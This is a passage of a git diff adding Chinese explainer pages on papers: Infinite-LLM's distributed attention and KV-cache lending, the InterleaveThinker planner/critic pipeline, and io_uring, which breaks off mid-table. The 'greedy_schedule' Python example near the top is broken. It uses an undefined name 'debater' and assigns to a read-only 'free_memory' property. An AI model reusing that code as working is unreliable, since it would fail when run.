仍然是 1,实例 D 的新块和本地短请求抢资源 + +**策略 2:主动放置**(Infinite-LLM) +- 长请求还没占满当前实例时,就**主动**把部分 KVCache 块借给有闲余空间的实例 +- 结果:实例 A 腾出显存,可以容纳更多短请求,batch size 从 1 提升到 10+ +- 实例 B、C 虽然多承担了一点 Attention 计算,但因为它们的 FFN 计算本就轻松,影响很小 + +### 债务人与债权人模型 + +- **债务人(Debtor)**:借入显存来存放自己部分 KVCache 的实例(A、D)。好处是 batch size 能提升,吞吐量增加;代价是要额外做聚合计算。 +- **债权人(Creditor)**:借出显存来存放他人部分 KVCache 的实例(B、C)。代价是自身的 batch size 可能下降;但因为 Attention 计算不依赖 batch,影响有限。 + +### 代码示例 2:调度决策简化示意 + +```python +from dataclasses import dataclass +from typing import List, Tuple + +@dataclass +class Instance: + id: str + total_memory: float # 总显存 (GB) + used_memory: float # 已用显存 (GB) + batch_size: int # 当前 batch size + request_lengths: List[int] # 各请求的长度 (token 数) + + @property + def free_memory(self) -> float: + return self.total_memory - self.used_memory + + @property + def is_creditor(self) -> bool: + # 如果空闲显存 > 30%,有资格当债权人 + return self.free_memory > self.total_memory * 0.3 + + @property + def is_debtor(self) -> bool: + # 如果显存使用率 > 90%,需要借钱 + return self.used_memory > self.total_memory * 0.9 + + +def estimate_throughput(instance: Instance) -> float: + """ + 估算实例的吞吐量(tokens/second) + 非 Attention 层的吞吐量随 batch size 提升 + Attention 层的吞吐量随请求长度增加而下降 + """ + # 简化模型:非 Attention 层贡献 + non_attn_tp = instance.batch_size * 100 # 假设每请求 100 tok/s + + # Attention 层贡献:请求越长越慢 + avg_length = sum(instance.request_lengths) / max(len(instance.request_lengths), 1) + attn_tp = 10000 / avg_length # 10000 是参考点 + + return non_attn_tp + attn_tp + + +def greedy_schedule(instances: List[Instance]) -> List[Tuple[str, str, float]]: + """ + 贪婪调度算法:每次选择让全局吞吐量提升最大的借/贷决策 + 返回:[(债务人ID, 债权人ID, 借入显存GB), ...] + """ + transfers = [] + + # 标记债务人和债权人 + debtors = [inst for inst in instances if inst.is_debtor] + creditors = [inst for inst in instances if inst.is_creditor] + + while debtors and creditors: + best_gain = 0.0 + best_pair = None + best_amount = 0.0 + + for debtor in debtors: + for creditor in creditors: + # 尝试让 debtor 从 creditor 借入不同大小的显存 + max_transfer = min( + creditor.free_memory * 0.5, # 债权人最多借出一半空闲 + debtor.free_memory * 2, # 债务人需要的"补偿空间" + ) + if max_transfer <= 0: + continue + + # 模拟转移 20% 空闲显存 + transfer = max_transfer * 0.2 + # 计算转移后的全局吞吐量 + # (简化:实际 Infinite-LLM 使用更精确的性能模型) + debtor_new_batch = min( + int(debater.batch_size * (1 + transfer / debtor.free_memory)), + 128, + ) + creditor_new_batch = max( + creditor.batch_size - 1, + 1, + ) + + # 估算提升 + old_global = sum(estimate_throughput(i) for i in instances) + # 模拟变更 + old_batch = debtor.batch_size + debtor.batch_size = debtor_new_batch + creditor.batch_size = creditor_new_batch + creditor.used_memory += transfer + creditor.free_memory -= transfer + debtor.used_memory -= transfer + debtor.free_memory += transfer + + new_global = sum(estimate_throughput(i) for i in instances) + gain = new_global - old_global + + # 恢复 + debtor.batch_size = old_batch + + if gain > best_gain: + best_gain = gain + best_pair = (debtor.id, creditor.id) + best_amount = transfer + + if best_pair is None or best_gain <= 0: + break + + transfers.append((best_pair[0], best_pair[1], best_amount)) + print(f" 调度: {best_pair[0]} <- {best_pair[1]} : {best_amount:.1f} GB (提升 {best_gain:.0f} tok/s)") + debtors = [i for i in instances if i.is_debtor] + creditors = [i for i in instances if i.is_creditor] + + return transfers + + +# 示例:模拟一个 32 GPU 集群的调度 +instances = [ + Instance("A", 80, 76, 1, [1000000]), # 债务人:长请求占满 + Instance("B", 80, 40, 50, [2000, 1500]), # 债权人:短请求,大量空闲 + Instance("C", 80, 50, 30, [3000]), # 债权人 + Instance("D", 80, 75, 3, [500000]), # 债务人:中长请求 + Instance("E", 80, 20, 80, [500, 800, 300]), # 债权人:大量空闲 +] + +print("=== 贪婪调度 ===") +print("初始吞吐量:", sum(estimate_throughput(i) for i in instances)) +result = greedy_schedule(instances) +print("最终吞吐量:", sum(estimate_throughput(i) for i in instances)) +print(f"执行了 {len(result)} 次调度") +``` + +--- + +## 核心概念 3:系统架构 — gManager + rManager + +Infinite-LLM 采用**集中式调度 + 分布式执行**的架构: + +- **gManager(全局管理器)**:单一控制器,运行调度算法,追踪整个集群的 KVCache 分布,协调实例间的通信。 +- **rManager(本地管理器)**:每个 GPU 实例上一个,负责执行调度决策、管理本地 KVCache、处理 DistAttention 的通信。 +- **协议**:定义了两个管理器之间的交互协议,包括 KVCache 的追踪、迁移和注意力结果的聚合。 + +为了优化通信开销,Infinite-LLM 还做了**通信重叠优化**:在本地 GPU 做模型推理的同时,异步地把 KVCache 块传输到债权人实例,让传输时间和计算时间重叠,而不是串行等待。 + +--- + +## 评估结果(32 张 A100) + +| 指标 | 结果 | +|---|---| +| 支持的最大上下文长度 | **2000K tokens**(200 万 token) | +| 吞吐量提升 | 相比现有方法提升 **1.35-3.4 倍** | +| 对比基线 | 传统静态模型并行 + 单实例 KVCache 调度 | +| 实验数据集 | 上下文长度从 1 到 2000K token | + +关键发现:Infinite-LLM 不仅解决了"超长上下文跑不了"的问题,更重要的是通过集群级资源调度,让短请求和长请求能够**互补利用资源**,整体吞吐量显著提升。 + +--- + +## 总结 + +Infinite-LLM 的核心洞察可以概括为一句话: + +> **Attention 层和非 Attention 层的资源需求特性完全不同,用同一套静态并行策略来服务所有请求,必然导致一方浪费、一方不够。** + +通过三个层层递进的创新,Infinite-LLM 解决了这个问题: + +1. **DistAttention** — 数学上等价变换 Attention,让 KVCache 可以分布式存储和计算,通信开销从 GB 级降到 KB 级 +2. **债务人/债权人调度** — 把集群显存当作一个池子,长请求从短请求的空闲空间中借内存,提升全局吞吐量 +3. **gManager + rManager** — 集中调度 + 分布式执行,支持实时动态调整 + +这套思路对理解 LLM 推理系统的演进很重要——它标志着从"固定资源分配"到"动态资源池化"的范式转变。后续的系统(如 vLLM 的 PagedAttention、DeepSpeed-UltraScale 等)都在不同方向上延续了类似的资源解耦思想。 diff --git a/src/content/docs/papers/infinitts-llm.md b/src/content/docs/papers/infinitts-llm.md new file mode 100644 index 000000000..2448a3b2a --- /dev/null +++ b/src/content/docs/papers/infinitts-llm.md @@ -0,0 +1,267 @@ +--- +title: Infinite-LLM — 用「分布式注意力」打破长文本的显存墙 +来源: https://arxiv.org/abs/2401.02669 +日期: 2026-06-13 +分类: 分布式系统 +子分类: 长上下文 +provenance: pipeline-v3 +--- + +## 从日常类比开始:图书馆里的「抄笔记」 + +想象一个大型图书馆(GPU 集群),读者(LLM 请求)需要查阅大量书籍(长文本 context)来做研究报告。 + +**传统做法**:每个读者分配一个**独立的书桌**。书少的读者(短 context)桌子大空着;书多的读者(长 context)桌子不够放,只能把书堆在地上——但堆在地上的书没法高效查阅。更麻烦的是,**所有书桌之间不能共享空间**,A 桌的空位 B 桌用不了。 + +**Infinite-LLM 的做法**:把"读书"和"抄笔记"分开。 +- **读书记(模型权重计算)**:仍在各自书桌上完成——这步计算量固定,跟读多少书无关。 +- **抄笔记(Attention + KV Cache)**:可以借到任何其他书桌的桌面上写。你不需要把整本书搬到别的桌子,只需告诉对方"我注意到你在第 37 页记了些东西,能告诉我你写了什么摘要吗?"——对方只需回传一个小小的摘要卡片(几个 KB),而不是整页书(几百 GB 的 KV cache)。 + +一句话:**Infinite-LLM 让 Attention 计算可以跨实例分布式执行,KV Cache 可以借来借去,集群的整体显存利用率从此不再被单个实例的物理边界锁死。** + +--- + +## 是什么 + +| 项目 | 内容 | +|------|------| +| 论文 | *Infinite-LLM: Efficient LLM Service for Long Context with DistAttention and Distributed KVCache* | +| 会议 | ASPLOS 2025(经 peer-review) | +| arXiv | [2401.02669](https://arxiv.org/abs/2401.02669) | +| 作者 | Lin Bin 等(阿里巴巴 + 上海交大 + 北大) | +| 开源 | 未开源(论文系统原型) | +| 实验规模 | 32 × A100 GPU,上下文长度 1 到 2000K tokens | + +Infinite-LLM 解决的是 LLM 推理服务中长期被忽视的一个问题:**Attention 层和非 Attention 层的资源需求是截然不同的。** + +- **非 Attention 层(FFN、Linear)**:计算量固定,不随 context 长度变化。batch 越大越好,受益于 GEMM 并行。 +- **Attention 层**:显存需求随 context 长度线性增长,计算量也随 context 变大。它**不受益于 batch 增大**。 + +现有系统(vLLM、Orca、Sarathi-Serve 等)用**静态模型并行**(Tensor Parallelism / Pipeline Parallelism)给整层模型分 GPU——短请求分了 8 张卡是浪费,长请求 1 张卡又装不下 KV Cache。 + +Infinite-LLM 的核心洞察:**把 Attention 层从模型中抽出来,独立调度。** 这引出了两个关键创新: + +1. **DistAttention** — 数学等价变换,让 Attention 可以跨实例分布式计算,只需传递 KB 级数据而非 GB/TB 级 KV Cache。 +2. **集群级 KV Cache 调度** — 将全集群 GPU 显存视为一个池子,"借"和"贷"的实例之间动态调度 KV Cache 分块。 + +--- + +## 核心概念 + +### 1. DistAttention:把 Attention "切碎" + +标准 Attention 的计算公式是: + +``` +Attention(Q, K, V) = Σᵢ [ exp(Q·Kᵢᵀ - m_g) / Σⱼ exp(Q·Kⱼᵀ - m_g) ] · Vᵢ + +其中 m_g = max(Q·K₁, ..., Q·K_seq) —— 全局最大值 +``` + +问题在于:`m_g` 需要**所有 sequence 上的 Q·K 值**才能算出来。如果你把 KV Cache 分到多台机器上,每台机器只知道自己那部分——每次 attention 计算都得把全部 KV Cache 拉回来,传输量是 GB 甚至 TB 级的。 + +**DistAttention 的解法**:借鉴 Online Softmax 的思想,把全局最大值拆解为两层: + +``` +第一步(本地 MicroAttention): + m_j = max(Q·K₁, ..., Q·K_seqp) ← 每台机器只算自己的局部最大值 + e_j = Σᵢ exp(Q·Kᵢᵀ - m_j) ← 局部归一化累加器 + +第二步(全局聚合): + m_g = max(m₁, ..., m_b) ← 收集 b 台机器的局部最大值,算全局最大值 + e_g = Σⱼ e_j · exp(m_j - m_g) ← 收集 b 台机器的 e_j,算全局累加器 + +第三步(加权合并): + Attention = Σⱼ [ MA_j · exp(m_j - m_g) / e_g ] +``` + +每台机器只需要回传**三个小数值**:`m_j`(局部最大值)、`e_j`(局部累加器)、以及 MA_j 的结果(输出向量片段)。对于一个 batch size=1 的请求,这三个值的总大小只有**几千字节**。 + +```python +# 伪代码:DistAttention 的本地计算(每个 GPU 实例上运行) + +class DistAttention: + def micro_attention(self, Q, K_local, V_local): + """ + Q: query 向量 [hidden_dim] + K_local: 本机的 KV cache 块 [seq_p, hidden_dim] + V_local: 本机的 V cache 块 [seq_p, hidden_dim] + 返回: (m_local, e_local, ma_result) + """ + # 1. 计算 Q 与本地 KV 的 attention scores + scores = torch.matmul(Q, K_local.T) # [seq_p] + + # 2. 局部最大值 (Online Softmax 的核心 trick) + m_local = scores.max() + + # 3. 局部归一化累加 + 加权 V 求和 + exp_scores = torch.exp(scores - m_local) # 数值稳定 + weights = exp_scores / exp_scores.sum() + ma_result = torch.matmul(weights, V_local) # [hidden_dim] + + # 4. 局部 e 值(用于后续全局归一化) + e_local = exp_scores.sum() + + return m_local, e_local, ma_result + + def global_aggregate(self, results_from_all_instances): + """ + results_from_all_instances: list of (m_j, e_j, ma_j) + 来自 b 个实例的局部结果,在这里合并 + """ + # 收集所有局部最大值 + m_values = [r[0] for r in results_from_all_instances] + m_global = max(m_values) + + # 计算全局归一化常数 + e_global = sum( + r[1] * math.exp(r[0] - m_global) + for r in results_from_all_instances + ) + + # 加权合并所有局部 MA 结果 + output = torch.zeros_like(results_from_all_instances[0][2]) + for m_j, e_j, ma_j in results_from_all_instances: + weight = math.exp(m_j - m_global) / e_global + output += weight * ma_j + + return output +``` + +### 2. 集群级 KV Cache 调度:债务人与债权人 + +有了 DistAttention,KV Cache 就不再需要"完整存放在一台机器上"。Infinite-LLM 把集群分成两类角色: + +- **债务人(Debtor)**:自己的显存不够放 KV Cache,需要向别人"借"空间。例如一个处理 1000K token 长文档的实例。 +- **债权人(Creditor)**:显存有富余,可以"借"空间给别人。例如处理多个短请求(几百 token)的实例。 + +```python +# 伪代码:调度器决策逻辑 + +class KVScheduler: + def __init__(self, cluster_instances): + self.instances = cluster_instances + # 每个实例的可用内存块数 + self.free_blocks = {inst.id: inst.free_memory_blocks for inst in cluster_instances} + + def decide_lend_borrow(self): + """ + 贪心调度:每次选择一个最有价值的"借-贷"配对 + """ + # 1. 识别债务人(内存不够放的实例) + debtors = [ + inst for inst in self.instances + if inst.needed_blocks > inst.available_blocks + ] + + # 2. 识别债权人(有内存富余的实例) + creditors = [ + inst for inst in self.instances + if inst.free_blocks > MIN_THRESHOLD + ] + + # 3. 贪心选择:每次选一个能最大化集群吞吐的配对 + while debtors and creditors: + best_pair = None + best_throughput_gain = 0 + + for debtor in debtors: + for creditor in creditors: + # 预估传输 N 个 block 后的集群总吞吐 + gain = self.estimate_throughput_gain( + debtor=debtor, + creditor=creditor, + num_blocks=min(creditor.free_blocks, debtor.needed_blocks) + ) + if gain > best_throughput_gain: + best_throughput_gain = gain + best_pair = (debtor, creditor, gain) + + if best_pair is None: + break + + debtor, creditor, gain = best_pair + # 执行调度:将 KV Cache 分块从债务人迁移到债权人 + num_blocks = min(creditor.free_blocks, debtor.needed_blocks) + self.migrate_kv_blocks(debtor, creditor, num_blocks) + + # 更新状态 + debtor.free_up_blocks(num_blocks) + creditor.lend_blocks(num_blocks) + + # 重新评估角色 + self._update_roles() + + def estimate_throughput_gain(self, debtor, creditor, num_blocks): + """ + 基于性能模型估算集群吞吐增益 + 参考论文 Equation 5: + T_layer(β, S) = max( + W(β) / f(β), # 非注意力层受 batch 影响 + S / g(S) # 注意力层受 context 长度影响 + ) + """ + current_total = self.compute_cluster_throughput() + + # 模拟迁移后的状态 + simulated_debtor = self.simulate_migration(debtor, creditor, num_blocks) + simulated_creditor = self.simulate_migration(creditor, debtor, num_blocks) + + # 迁移后:债务人 batch 变大(吞吐涨),债权人 batch 不变(影响小) + new_total = current_total \ + - simulated_debtor.compute_throughput() \ + - simulated_creditor.compute_throughput() \ + + debtor.compute_throughput() \ + + creditor.compute_throughput() + + return new_total +``` + +### 3. gManager / rManager:集中式调度 + 分布式执行 + +``` + +------------+ + | gManager | ← 全局调度决策(知道所有实例的状态) + | (大脑) | + +-----+------+ + | RPC + +-----------+-----------+ + | | | + +-----v----+ +-----v----+ +-----v----+ + | rManager | | rManager | | rManager | ← 每台机器一个本地管理器 + | (Node A) | | (Node B) | | (Node C) | + +-----+----+ +-----+----+ +-----+----+ + | | | + +-----v----+ +-----v----+ +-----v----+ + | GPU 0..7 | | GPU 0..7 | | GPU 0..7 | + +----------+ +----------+ +----------+ +``` + +- **gManager**:全局协调器,维护所有实例的 KV Cache 布局、内存使用情况,运行调度算法。 +- **rManager**:每个物理节点上的本地管理器,执行实际的 KV Cache 迁移、DistAttention 计算调度。 + +通信开销优化:KV Cache 传输与本地计算**重叠**(Pipeline),让数据传输"隐形"。 + +--- + +## 为什么重要 + +- **短请求不再被长请求拖累**:传统系统里,一张卡上一个长请求就会吃掉全部显存,其他短请求排队等。Infinite-LLM 让长请求的 KV Cache 可以"溢出"到空闲的卡上。 +- **长请求不再被单卡卡住**:2000K token 的上下文,传统单 A100(80GB)根本放不下。Infinite-LLM 用 32 张卡轻松支持。 +- **吞吐提升 1.35-3.4x**:在 32 × A100 的集群上,相比 vLLM / Orca 等 SOTA 方法。 + +--- + +## 一句话总结 + +**Infinite-LLM = 把 Attention 层从模型中独立出来,用 DistAttention 让它能跨机器分布式计算,然后用一个"借内存"的调度器把全集群显存变成一个超级大池子。** + +--- + +## 思考题 + +1. DistAttention 的 Online Softmax 变换和 vLLM 的 PagedAttention 各自解决什么问题?它们的正交性如何? +2. 论文中的"债务人/债权人"模型和 Cassandra 的"种子节点/副本"机制有什么类比关系? +3. 如果 gManager 挂了怎么办?论文提到集中式调度,这在生产环境中是单点故障吗? + +(等你的回答后,我们继续深入下一部分。) diff --git a/src/content/docs/papers/interleave-thinker.md b/src/content/docs/papers/interleave-thinker.md new file mode 100644 index 000000000..620ce4246 --- /dev/null +++ b/src/content/docs/papers/interleave-thinker.md @@ -0,0 +1,229 @@ +--- +title: InterleaveThinker: Reinforcing Agentic Interleaved Generation +来源: https://arxiv.org/abs/2606.13679 +日期: 2026-06-13 +分类: 机器学习 +子分类: 智能体 +provenance: pipeline-v3 +--- + +# InterleaveThinker: Reinforcing Agentic Interleaved Generation + +## 1 一句话总结 + +这篇文章提出了一套"多智能体流水线",让原本只能画单张图片的 AI 图像生成器,拥有了连续生成"文字+图片"交替序列的能力。 + +## 2 日常类比:拍一部四格漫画 + +想象你要让一位画家按你的要求画一部四格漫画: + +- **传统做法**(现有模型):你告诉画家"画第一格",他画完。然后你指着第一格说"接着画第二格",画家看着第一格画第二格,再看第二格画第三格……问题是:画家常被前面已经画好的格子"带偏",画到第三格时可能突然觉得"嗯,这跟结局很像"就提前收尾了。而且一旦第二格画歪了,第三格、第四格会越画越歪——这就是论文说的"视觉过度依赖"和"逐步误差累积"。 + +- **InterleaveThinker 的做法**:你请来三个人协作。 + 1. **规划师(Planner)**:先不看画布,一次性把所有格子的画法写在纸上(全局计划)。 + 2. **画家(Generator)**:按照纸上写的步骤,一格一格地画。 + 3. **质检员(Critic)**:每画完一格就看一眼——"这格跟规划师写的步骤对得上吗?"如果不对,就修改画法的描述,让画家重画这一格,直到合格为止。 + +关键区别:规划师在开始时就把所有步骤想好了,画家画图时看不到中间结果,所以不会被前面的格子带偏。质检员负责在每个步骤上把关。 + +## 3 核心概念拆解 + +### 3.1 什么是"交错生成"(Interleaved Generation) + +传统图像生成模型只接受一段文字,输出一张图片。而"交错生成"指的是输入和输出都是**文字和图片交替排列的序列**,比如: + +``` +[文字: "一只猫坐在窗台上"] +[图片: 猫的图像] +[文字: "然后月亮升起来了"] +[图片: 月亮升起后的场景] +[文字: "最后星星出现了"] +[图片: 星空下的猫] +``` + +这种能力对于制作视觉叙事(故事漫画)、操作指导(一步步的教学图解)、机器人操控(每一步的动作可视化)都非常重要。 + +### 3.2 为什么现有模型做不到? + +有两种主流方法尝试解决这个问题,都有缺陷: + +**方法一:直接训练端到端的多模态模型(UMM)** + +像 Janus-Pro、Emu3.5 这样的模型,天生就能生成文字+图片交替序列。但它们在生成长序列时会遇到两个问题: + +- **视觉过度依赖**:模型太依赖前面已经生成的图片,容易在中间状态就"误以为"已经完成了目标,提前结束。 +- **逐步误差累积**:第一步稍微画歪了一点,第二步就会跟着歪,第三步更歪,最后完全失控。 + +**方法二:让同一个 VLM 既规划又评估** + +如果用一个模型同时做规划和评估,它会因为不断看到中间生成的图片而"短视"——只顾眼前的局部反馈,忘了最终目标。 + +### 3.3 InterleaveThinker 的解决方案:三人协作 + +论文的核心创新就是把"规划"和"评估"拆给两个不同的模型来做: + +``` +输入: 用户的文字/图片描述 + │ + ▼ + ┌───────────┐ + │ Planner │ ← 一次性生成所有步骤的计划(不看中间图片) + └─────┬─────┘ + │ 输出: [(步骤1指令, 步骤1提示词, 辅助文本), ...] + │ + ▼ + ┌───────────┐ + │ Generator │ ← 用现有的图像生成模型(如 FLUX.2-klein) + └─────┬─────┘ + │ 输出: 当前步骤的图片 + │ + ▼ + ┌───────────┐ + │ Critic │ ← 对比图片和计划,判断是否合格 + └─────┬─────┘ + │ 不合格? → 修改提示词 → 回到 Generator 重画 + │ 合格? → 进入下一步 + ▼ + 输出: 完整的文字+图片交替序列 +``` + +## 4 代码示例 + +### 示例一:整个流程的工作伪代码 + +```python +# 用户输入: "画一个苹果从红变绿的过程" +input_sequence = "画一个苹果从红变绿的过程" + +# === 第 1 步: Planner 生成全局计划 === +# Planner 一次性输出所有步骤,不看任何图片 +plan = planner(input_sequence) +# plan 的输出类似: +# [ +# {"instruction": "画一个红色的苹果", +# "prompt": "a fresh red apple on a wooden table, realistic style", +# "auxiliary": "apple should be bright red with a small stem"}, +# {"instruction": "苹果开始变黄", +# "prompt": "the same apple now showing yellow patches, transition phase", +# "auxiliary": "yellow should appear as gradual color shift"}, +# {"instruction": "苹果完全变成绿色", +# "prompt": "a fresh green apple on a wooden table, realistic style", +# "auxiliary": "green apple should look ripe and shiny"} +# ] + +# === 第 2~3 步: Generator + Critic 循环执行每个步骤 === +output_sequence = [] +for step in plan: + refined_prompt = step["prompt"] # 初始提示词 + for _ in range(max_iterations=5): + # Generator 根据提示词生成图片 + image = generator(refined_prompt, previous_image) + + # Critic 评估这张图片是否符合当前步骤的要求 + judgment, refined_prompt, reasoning = critic( + previous_image, # 上一张图 + image, # 刚生成的图 + step["prompt"], # 原始计划中的提示词 + refined_prompt # 当前使用的提示词 + ) + + if judgment == True: + # 质检通过,记录结果并进入下一步 + output_sequence.append({ + "text": step["instruction"], + "image": image, + "auxiliary": step["auxiliary"] + }) + break # 跳出重试循环,进入下一步 + else: + # 质检不通过,用 Critic 给出的新提示词重试 + pass # refined_prompt 已经被更新了 + +# === 最终输出 === +# 得到完整的交错序列: +# [文字, 图片, 文字, 图片, 文字, 图片] +``` + +### 示例二:Critic 的奖励函数(GRPO 强化学习) + +Critic 模型通过强化学习来改进自己的"质检能力"。论文提出了一个巧妙的**双奖励机制**,而不是对整个长序列做优化(那样计算量太大,一个序列可能需要 25 次以上调用图像生成器)。 + +```python +# 假设 Critic 在第 i 步的第 t 次迭代中做出了判断 +def compute_reward(previous_image, current_image, next_image, + original_prompt, refined_prompt): + """ + 计算 Critic 在这一轮迭代中的综合奖励。 + 只优化单步,不优化整个长序列 —— 这是论文的关键设计。 + """ + + # --- 奖励 1: 准确性奖励 (Accuracy Reward) --- + # 衡量 Critic 的判断是否正确 + predicted_judgment = critic.predict(previous_image, current_image, + original_prompt, refined_prompt) + ground_truth_judgment = get_ground_truth(previous_image, current_image) + accuracy_reward = -abs(predicted_judgment - ground_truth_judgment) + # 判断越准确,负值越小(奖励越大) + + # --- 奖励 2: 步骤奖励 (Step-wise Reward) --- + # 衡量 Critic 修改提示词后,图片质量是否有提升 + # 用 Gemini 2.5 Pro 作为评分器来打分 + original_score = gemini_score(previous_image, current_image, + original_prompt, refined_prompt) + improved_score = gemini_score(previous_image, next_image, + original_prompt, next_refined_prompt) + step_reward = improved_score - original_score + # 分数提升了,step_reward 就是正的 + + # --- 综合奖励 --- + alpha = 0.2 # 准确性奖励的权重 + format_reward = 1.0 if critic_output_format_correct else 0.0 + + total_reward = ( + 0.5 * format_reward + + 0.5 * (alpha * accuracy_reward + (1 - alpha) * step_reward) + ) + return total_reward +``` + +为什么要这样设计? + +- 一个完整的交错生成序列可能需要 25 次以上的图像生成调用 +- 如果用传统的强化学习优化整个序列,计算成本极高且不稳定 +- 把问题拆解成"单步优化",每一步的奖励独立计算,大大降低了难度 +- 因为 Planner 已经把全局计划定好了,只要每一步都做好,整个序列自然就好 + +## 5 训练数据是怎么来的? + +论文构建了三个专用数据集: + +| 数据集 | 规模 | 用途 | +|--------|------|------| +| Interleave-Planner-SFT-80k | 8 万条 | 训练 Planner 学会分解任务 | +| Interleave-Critic-SFT-112k | 11.2 万条 | 训练 Critic 学会评估和修改提示词 | +| Interleave-Critic-RL-13k | 1.3 万条 | 用强化学习进一步训练 Critic | + +构建流程大致是:先用 Gemini 2.5 Pro 和 Nano Banana Pro 生成高质量的多智能体交互轨迹,然后用严格的过滤流程筛选出高质量样本。 + +## 6 实验结果亮点 + +- 在 UEval 基准测试上,InterleaveThinker + FLUX.2-klein 达到了 **66.3 分**,超过了所有开源多模态模型,接近闭源的 Nano Banana(76.1 分)。 +- 更令人意外的是,这个方法还大幅提升了基础模型的**推理能力**: + - WISE 基准:从 0.47 提升到 **0.73** + - RISE 基准:从 13.3 提升到 **28.9** +- 这套框架是**模型无关**的——换用更强的图像生成器(如 Qwen-Image-Edit),效果还会进一步提升。 + +## 7 关键设计决策:为什么只给 Critic 做强化学习? + +这是一个值得思考的设计选择: + +- **Planner 不做 RL**:因为一个序列可能涉及 25 次以上的图像生成调用,奖励信号太稀疏,RL 极不稳定。而且 SFT 阶段的效果已经足够好。 +- **Critic 做 RL**:因为 Critic 的每次判断都是"局部"的(只看一步),奖励信号密集且明确,适合用 GRPO 做单步强化学习。 + +这体现了论文的一个核心理念:**把复杂问题拆解成可以独立优化的局部问题**。 + +## 8 我的理解 + +InterleaveThinker 最打动我的一点是:它没有试图去训练一个更大的模型来解决这个问题,而是用了一种"工程化"的思路——把一个大问题拆成三个角色,各司其职。规划师负责"想清楚",画家负责"画出来",质检员负责"把关"。这种思路在很多 AI 场景中可能都有借鉴价值。 + +另外,双奖励机制的设计也很巧妙——与其费力优化一个长长的序列,不如确保每一步都走对。这让我想到了一句老话:"千里之行,始于足下"。 diff --git a/src/content/docs/papers/io-uring-axboe-2019.md b/src/content/docs/papers/io-uring-axboe-2019.md new file mode 100644 index 000000000..948b8b34f --- /dev/null +++ b/src/content/docs/papers/io-uring-axboe-2019.md @@ -0,0 +1,288 @@ +--- +title: Efficient IO with io_uring — Linux 异步 IO 的环形队列革命 +来源: 'https://kernel.dk/io_uring.pdf' +日期: 2026-06-13 +分类: 操作系统 +子分类: 内核与虚拟化 +难度: 中级 +provenance: pipeline-v3 +--- + +## 是什么 + +Jens Axboe 在 2019 年发表的这篇白皮书,介绍了 Linux 新一代异步 IO 接口 **io_uring**。它的核心思想可以用一句日常类比概括: + +> 传统 IO 像**每次点外卖都要打电话**给餐厅确认订单;io_uring 则是在你和厨房之间放**两条共享传送带**——你把订单卡放上去,厨师做完菜把回执放下来,**只有带子快满或你要催单时才按一次门铃**(syscall)。 + +两条传送带在文档里的正式名称是: + +| 名称 | 谁写 | 谁读 | 放什么 | +|------|------|------|--------| +| **SQ ring**(Submission Queue) | 应用程序 | 内核 | 「我要做什么 IO」——Submission Queue Entry(SQE) | +| **CQ ring**(Completion Queue) | 内核 | 应用程序 | 「做完了,结果是…」——Completion Queue Event(CQE) | + +io_uring 在 Linux 5.1(2019 年 5 月)合入主线。作者 Axboe 是 Linux block layer 长期维护者,也是磁盘压测工具 **fio** 的作者——他比任何人都清楚旧接口哪里不够用。 + +## 为什么需要它:旧接口哪里不行 + +Linux 做文件 IO 的方式很多:`read`/`write`、`pread`/`pwrite`、向量版 `preadv`/`pwritev`……但它们有一个共同点:**同步**——syscall 返回时,数据已经读完或写完。 + +想要异步,POSIX 有 `aio_read`/`aio_write`,性能往往很差;Linux 还有原生 **libaio**(`io_submit`/`io_getevents`),白皮书列举了它的致命缺陷: + +1. **只支持 O_DIRECT**:普通 buffered IO(走 page cache 的读写)在 libaio 里**退化成同步**,大多数应用根本用不了。 +2. **提交路径不确定**:元数据 IO、设备 request slot 满时,提交本身可能阻塞——你以为在「异步提交」,实际上还在等。 +3. **内存拷贝开销大**:每次提交拷贝 64+8 字节、每次完成拷贝 32 字节,对小块 IO 很亏。 +4. **至少两次 syscall**:一次 submit、一次 wait——在 Spectre/Meltdown 之后,syscall 本身就更贵了。 + +当 NVMe SSD 延迟压到 10µs 以下、单盘 IOPS 破百万时,这些开销从「能忍」变成「卡脖子」。Axboe 最初尝试修补 libaio,发现只能解决其中一个问题,代码还变得更乱——于是**从零设计 io_uring**。 + +## 设计目标(白皮书 §3) + +按重要性从低到高,白皮书列了五条: + +1. **易用、难误用** —— 接口直觉清晰。 +2. **可扩展** —— 不只服务块设备,还要覆盖网络和未来新 IO 类型。 +3. **功能丰富** —— 不让每个应用自己造 IO 线程池。 +4. **高效** —— 单请求开销要低,512B~4KB 的小 IO 也要划算。 +5. **可扩展(scalability)** —— 单核能榨干现代存储的峰值 IOPS。 + +这五条看似互相矛盾(高效 + 易用往往冲突),io_uring 用**共享内存 + 环形队列**把矛盾压到最低。 + +## 核心概念 + +### 1. 双环 = 生产者-消费者模型 + +异步 IO 有两类动作:**提交请求**和**收割完成**。 + +- 提交时:应用是生产者,内核是消费者 → **SQ ring** +- 完成时:内核是生产者,应用是消费者 → **CQ ring** + +每个环都是 **SPSC ring buffer**(单生产者单消费者环形缓冲区):用 `head`/`tail` 两个计数器协调,**不需要和内核抢同一把锁**,靠内存屏障(memory barrier)保证可见性即可。 + +环大小必须是 **2 的幂**;用 `index = tail & mask` 定位槽位,计数器自然回绕,不必维护「环已满」标志。 + +### 2. SQE 与 CQE:两张「订单卡」 + +**SQE**(64 字节,Submission Queue Entry)描述一次 IO 请求: + +```c +struct io_uring_sqe { + __u8 opcode; // 操作码,如 IORING_OP_READV + __u8 flags; + __u16 ioprio; + __s32 fd; + __u64 off; // 文件偏移 + __u64 addr; // 缓冲区地址或 iovec 指针 + __u32 len; + /* ... opcode 专用 flags union ... */ + __u64 user_data; // 内核原样抄到 CQE,用于关联请求 +}; +``` + +**CQE**(Completion Queue Event)描述完成结果: + +```c +struct io_uring_cqe { + __u64 user_data; // 从 SQE 原样带回 + __s32 res; // 类似 syscall 返回值:成功=字节数,失败=负 errno + __u32 flags; +}; +``` + +关键约定:**完成顺序 ≠ 提交顺序**。网络乱序、磁盘调度都会让 CQE 乱序到达——必须用 `user_data` 把 SQE 和 CQE 配对,不能假设「第 3 个提交的一定第 3 个完成」。 + +### 3. SQ 环的间接索引 + +CQ 环直接索引 CQE 数组;SQ 环则多一层:**环里存的是 SQE 数组的下标**,不是 SQE 本身。这样应用可以把 SQE 嵌进自己的结构体里,批量提交时不必保证 SQE 在内存中连续——迁移老代码更自然。 + +### 4. 三个 syscall + 三段 mmap + +| 步骤 | 系统调用 / 操作 | 作用 | +|------|-----------------|------| +| 创建实例 | `io_uring_setup(entries, ¶ms)` | 返回 fd;`entries` 必须是 2 的幂,1~4096 | +| 映射共享内存 | `mmap(..., 